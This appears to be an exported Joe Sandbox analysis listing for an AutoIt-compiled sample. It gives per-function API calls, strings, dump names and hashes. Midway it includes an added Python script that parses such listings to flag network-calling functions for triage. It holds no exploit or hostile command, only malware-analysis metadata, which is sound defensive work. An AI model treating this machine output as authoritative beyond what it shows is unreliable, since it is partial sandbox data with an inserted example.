                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: __snwprintf_memmove
                                                                                                                • String ID: , $$AUTOITCALLVARIABLE%d
                                                                                                                • API String ID: 3506404897-2584243854
                                                                                                                • Opcode ID: 9c7fb2c95b581734de54890f6ef092d2fdaca73b8b65ce98ff6f510cf32ea9f5
                                                                                                                • Instruction ID: 19407118ea31040857e814f675c44205aa8ec922ccadf9fde8f24e94e641da3e
                                                                                                                • Opcode Fuzzy Hash: 9c7fb2c95b581734de54890f6ef092d2fdaca73b8b65ce98ff6f510cf32ea9f5
                                                                                                                • Instruction Fuzzy Hash: 0821CE31620218AACF04EFA4CC86EEE77B9EF45701F500456F945A7182DB70EE66CFA5
                                                                                                                APIs
                                                                                                                • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00269269
                                                                                                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00269274
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend
                                                                                                                • String ID: Combobox
                                                                                                                • API String ID: 3850602802-2096851135
                                                                                                                • Opcode ID: 51b25cc2eaea75a8918dbebabfcbbfe778e86b480748dfcdb916822373cde416
                                                                                                                • Instruction ID: 3c8fbd2644bfefa51984518bc46e576ab782f608a47915f00185be08dd7797a6
                                                                                                                • Opcode Fuzzy Hash: 51b25cc2eaea75a8918dbebabfcbbfe778e86b480748dfcdb916822373cde416
                                                                                                                • Instruction Fuzzy Hash: BF119371620109BFEF119F54DC91EEB379EEB893A4F104124F91897290DA719CF18BA0
                                                                                                                APIs
                                                                                                                  • Part of subcall function 0021C619: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0021C657
                                                                                                                  • Part of subcall function 0021C619: GetStockObject.GDI32(00000011), ref: 0021C66B
                                                                                                                  • Part of subcall function 0021C619: SendMessageW.USER32(00000000,00000030,00000000), ref: 0021C675
                                                                                                                • GetWindowRect.USER32(00000000,?), ref: 00269775
                                                                                                                • GetSysColor.USER32(00000012), ref: 0026978F
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                                                                • String ID: static
                                                                                                                • API String ID: 1983116058-2160076837
                                                                                                                • Opcode ID: 307d6556ba063128e16a48f398ca694d1bfab356c13503e1572c450453d328d1
                                                                                                                • Instruction ID: 0bc0d183f1fa51fae13de97ab7f5c16cdaa1d112b0cc08937b184c33958aa235
                                                                                                                • Opcode Fuzzy Hash: 307d6556ba063128e16a48f398ca694d1bfab356c13503e1572c450453d328d1
                                                                                                                • Instruction Fuzzy Hash: 5711597652020AAFDB05DFB8DC46EEA7BA8EB08314F000629F955E3240E634E8A1DB50
                                                                                                                APIs
                                                                                                                • GetWindowTextLengthW.USER32(00000000), ref: 002694A6
                                                                                                                • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 002694B5
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: LengthMessageSendTextWindow
                                                                                                                • String ID: edit
                                                                                                                • API String ID: 2978978980-2167791130
                                                                                                                • Opcode ID: 84b4d558c2ba490d321a33c2e5c3a676a5c3a3f6795b018dfa6e2b50f0c81bf0
                                                                                                                • Instruction ID: 33d782cd64f99320aa3343923de950a7f03030f6ddd8c07ce19ab9f8a123ee35
                                                                                                                • Opcode Fuzzy Hash: 84b4d558c2ba490d321a33c2e5c3a676a5c3a3f6795b018dfa6e2b50f0c81bf0
                                                                                                                • Instruction Fuzzy Hash: 1C115B71120109AAEF108E64EC45AEB376DEB05374F604724F965971D0CA769CE29B60
                                                                                                                APIs
                                                                                                                • _memset.LIBCMT ref: 00245CF3
                                                                                                                • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00245D12
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InfoItemMenu_memset
                                                                                                                • String ID: 0
                                                                                                                • API String ID: 2223754486-4108050209
                                                                                                                • Opcode ID: 8c33b4b9ea8832f304b89d50eec5f1bd730ab6e7a6c8f38b04b45d256621e6b8
                                                                                                                • Instruction ID: da38d59537771a1864cdb569ad6182bd10e9f938bc4a1186d0833579a6c30fcf
                                                                                                                • Opcode Fuzzy Hash: 8c33b4b9ea8832f304b89d50eec5f1bd730ab6e7a6c8f38b04b45d256621e6b8
                                                                                                                • Instruction Fuzzy Hash: 68118171D21639EBDB28DE58E849F9977E99F06354F180012F981EB192D3709D24CB91
                                                                                                                APIs
                                                                                                                • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0025544C
                                                                                                                • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00255475
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Internet$OpenOption
                                                                                                                • String ID: <local>
                                                                                                                • API String ID: 942729171-4266983199
                                                                                                                • Opcode ID: 6e927f8f92fefe813fc46b585cd8f57e80df524ea003cb9e58f7a747235eb338
                                                                                                                • Instruction ID: 7ac6f621eb8dbef175081ffd72ea378c17748701458a16c364b79bd1af499365
                                                                                                                • Opcode Fuzzy Hash: 6e927f8f92fefe813fc46b585cd8f57e80df524ea003cb9e58f7a747235eb338
                                                                                                                • Instruction Fuzzy Hash: 34119174161A32BADB158F5198A8EEAFB68EF12753F10812AF94556040E3B069A8C6B4
                                                                                                                APIs
                                                                                                                • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00234557
                                                                                                                • ___raise_securityfailure.LIBCMT ref: 0023463E
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FeaturePresentProcessor___raise_securityfailure
                                                                                                                • String ID: (,
                                                                                                                • API String ID: 3761405300-1315560676
                                                                                                                • Opcode ID: c7cdcc9e421cfc235eec66a2b7a02c8d62f3e2e5f5b08135ac0cc48f0c44df91
                                                                                                                • Instruction ID: 6a75a97f2a2453800fd860c2bff2684438b12750c9db31e5014767653a9d5218
                                                                                                                • Opcode Fuzzy Hash: c7cdcc9e421cfc235eec66a2b7a02c8d62f3e2e5f5b08135ac0cc48f0c44df91
                                                                                                                • Instruction Fuzzy Hash: BD21ECB59A0204DBD704DF58FADAE403BB4FB48314F50582AE9098A3A1E3F0A990CF85
                                                                                                                APIs
                                                                                                                • inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 0025ACF5
                                                                                                                • htons.WSOCK32(00000000,?,00000000), ref: 0025AD32
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: htonsinet_addr
                                                                                                                • String ID: 255.255.255.255
                                                                                                                • API String ID: 3832099526-2422070025
                                                                                                                • Opcode ID: a37ac23eb56743eb484b4ee0a185e92b584f982e4d8ae4d8a129d9ffb31cfe3c
                                                                                                                • Instruction ID: 1fb3849da0d59647e03a5a68eafc8723fcced2dc959f0670fa3c2a287e1f0829
                                                                                                                • Opcode Fuzzy Hash: a37ac23eb56743eb484b4ee0a185e92b584f982e4d8ae4d8a129d9ffb31cfe3c
                                                                                                                • Instruction Fuzzy Hash: FD01D274220205ABDB14AFA4D847FAEB374FF04721F108626F9159B2D1D771E828CB5A
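The entries above are the report's per-function export: the API calls with their call-site addresses (calls made inside a callee are marked "Part of subcall function"), the referenced strings, the memory dump the function was lifted from, and the similarity hashes. As an added example that is not part of the Joe Sandbox report, the following Python script parses that text format into records and flags the entries a triager would open first: here the two functions that call into WININET and WSOCK32 directly, and the block that references $AUTOITCALLVARIABLE%d. The sample input is a constructed excerpt copied from three entries above and trimmed; the list of network modules and the "AUTOIT" string check are the example's own heuristics, not anything the report states.

```python
"""Parse Joe Sandbox "Executed Functions" text blocks (as in the listing above)
into records and pull out the ones worth opening first in a disassembler."""
import re
from collections import Counter
from dataclasses import dataclass, field
from typing import Optional

# Constructed sample: three entries copied from the listing above, trimmed to
# the fields this parser uses. Not the full report.
SAMPLE = """\
APIs
• __snwprintf.LIBCMT ref: 00256BDD
  • Part of subcall function 0020CAEE: _memmove.LIBCMT ref: 0020CB2F
Strings
Memory Dump Source
• Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmpDownload File
Similarity
• API ID: __snwprintf_memmove
• String ID: , $$AUTOITCALLVARIABLE%d
• Opcode ID: 9c7fb2c95b581734de54890f6ef092d2fdaca73b8b65ce98ff6f510cf32ea9f5
APIs
• InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0025544C
• InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00255475
Similarity
• API ID: Internet$OpenOption
• String ID: <local>
• Opcode ID: 6e927f8f92fefe813fc46b585cd8f57e80df524ea003cb9e58f7a747235eb338
APIs
• inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 0025ACF5
• htons.WSOCK32(00000000,?,00000000), ref: 0025AD32
Similarity
• API ID: htonsinet_addr
• String ID: 255.255.255.255
• Opcode ID: a37ac23eb56743eb484b4ee0a185e92b584f982e4d8ae4d8a129d9ffb31cfe3c
"""

API_RE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<sub>[0-9A-F]+): )?"
    r"(?P<name>\w+)\.(?P<module>\w+)(?:\((?P<args>[^)]*)\))?,? ref: (?P<ref>[0-9A-F]+)$"
)
FIELD_RE = re.compile(r"^•\s*(?P<key>[^:]+): ?(?P<val>.*)$")
SECTIONS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
# Example's own heuristic list of DLLs whose callers get looked at first.
NETWORK_MODULES = {"WININET", "WINHTTP", "WSOCK32", "WS2_32", "URLMON"}


@dataclass
class ApiCall:
    name: str
    module: str
    ref: str                          # call-site address in the dumped image
    args: list
    subcall_of: Optional[str] = None  # set when the call happens inside a callee


@dataclass
class FunctionBlock:
    apis: list = field(default_factory=list)
    fields: dict = field(default_factory=dict)  # "Opcode ID", "String ID", ...

    @property
    def opcode_id(self):
        return self.fields.get("Opcode ID", "")

    @property
    def string_id(self):
        return self.fields.get("String ID", "")


def parse_blocks(text):
    """Every entry starts with an 'APIs' heading; the other headings only switch
    which kind of line is expected next."""
    blocks, cur, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()             # the web export indents every line
        if line in SECTIONS:
            if line == "APIs":
                cur = FunctionBlock()
                blocks.append(cur)
            section = line
            continue
        if cur is None or not line:
            continue
        if section == "APIs":
            m = API_RE.match(line)
            if m:
                args = [a for a in (m["args"] or "").split(",") if a]
                cur.apis.append(ApiCall(m["name"], m["module"], m["ref"], args, m["sub"]))
        else:
            m = FIELD_RE.match(line)
            if m:  # the export fuses the "Download File" link text onto dump names
                cur.fields[m["key"].strip()] = re.sub(r"Download File$", "", m["val"]).strip()
    return blocks


def triage(blocks):
    """Rank what to open first: functions that call a network DLL directly (not
    only via a subcall), plus runtime fingerprints visible in the string IDs."""
    report = {"network": [], "autoit_runtime": False, "modules": Counter()}
    for b in blocks:
        report["modules"].update(c.module for c in b.apis)
        direct = {c.module for c in b.apis if c.subcall_of is None}
        if direct & NETWORK_MODULES:
            report["network"].append((b.opcode_id[:16], sorted(direct & NETWORK_MODULES), b.string_id))
        if "AUTOIT" in b.string_id.upper():
            report["autoit_runtime"] = True
    return report


if __name__ == "__main__":
    summary = triage(parse_blocks(SAMPLE))
    print("AutoIt runtime string seen:", summary["autoit_runtime"])
    for opcode, mods, s in summary["network"]:
        print(f"{opcode}  {','.join(mods):<8}  string={s!r}")
```

Feed it the whole "Executed Functions" text of a report instead of SAMPLE and the module counter gives a quick import-by-DLL profile, while the opcode-ID prefixes in the network list are what to paste into the disassembler's function search.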
                                                                                                                APIs
                                                                                                                  • Part of subcall function 0020CAEE: _memmove.LIBCMT ref: 0020CB2F
                                                                                                                • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 0023C5E5
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend_memmove
                                                                                                                • String ID: ComboBox$ListBox
                                                                                                                • API String ID: 1456604079-1403004172
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: __fread_nolock_memmove
                                                                                                                • String ID: EA06
                                                                                                                • API String ID: 1988441806-3962188686
                                                                                                                APIs
                                                                                                                  • Part of subcall function 0020CAEE: _memmove.LIBCMT ref: 0020CB2F
                                                                                                                • SendMessageW.USER32(?,00000180,00000000,?), ref: 0023C4E1
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend_memmove
                                                                                                                • String ID: ComboBox$ListBox
                                                                                                                • API String ID: 1456604079-1403004172
                                                                                                                APIs
                                                                                                                  • Part of subcall function 0020CAEE: _memmove.LIBCMT ref: 0020CB2F
                                                                                                                • SendMessageW.USER32(?,00000182,?,00000000), ref: 0023C562
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend_memmove
                                                                                                                • String ID: ComboBox$ListBox
                                                                                                                • API String ID: 1456604079-1403004172
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ClassName_wcscmp
                                                                                                                • String ID: #32770
                                                                                                                • API String ID: 2292705959-463685578
                                                                                                                APIs
                                                                                                                • __umatherr.LIBCMT ref: 0022DA2A
                                                                                                                  • Part of subcall function 0022DD86: __ctrlfp.LIBCMT ref: 0022DDE5
                                                                                                                • __ctrlfp.LIBCMT ref: 0022DA47
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: __ctrlfp$__umatherr
                                                                                                                • String ID: xn'
                                                                                                                • API String ID: 219961500-4225176504
                                                                                                                APIs
                                                                                                                • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 0023B36B
                                                                                                                  • Part of subcall function 00222011: _doexit.LIBCMT ref: 0022201B
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Message_doexit
                                                                                                                • String ID: AutoIt$Error allocating memory.
                                                                                                                • API String ID: 1993061046-4017498283
                                                                                                                APIs
                                                                                                                • GetSystemDirectoryW.KERNEL32(?), ref: 0027BAB8
                                                                                                                • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 0027BCAB
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: DirectoryFreeLibrarySystem
                                                                                                                • String ID: WIN_XPe
                                                                                                                • API String ID: 510247158-3257408948
                                                                                                                APIs
                                                                                                                • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0026849F
                                                                                                                • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 002684B2
                                                                                                                  • Part of subcall function 00248355: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 002483CD
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FindMessagePostSleepWindow
                                                                                                                • String ID: Shell_TrayWnd
                                                                                                                • API String ID: 529655941-2988720461
APIs
• FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 002684DF
• PostMessageW.USER32(00000000), ref: 002684E6
  • Part of subcall function 00248355: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 002483CD
Strings
Memory Dump Source
• Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
• Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
Similarity
• API ID: FindMessagePostSleepWindow
• String ID: Shell_TrayWnd
• API String ID: 529655941-2988720461
APIs
• GetTempPathW.KERNEL32(00000104,?), ref: 0024D01E
• GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 0024D035
Strings
Memory Dump Source
• Source File: 0000000A.00000002.1608198130.0000000000201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00200000, based on PE: true
• Associated: 0000000A.00000002.1608176512.0000000000200000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608271691.000000000028D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608271691.00000000002AE000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608565940.00000000002BA000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.1608599523.00000000002C4000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_200000_TCPKPY.jbxd
Similarity
• API ID: Temp$FileNamePath
• String ID: aut
• API String ID: 3285503233-3010740371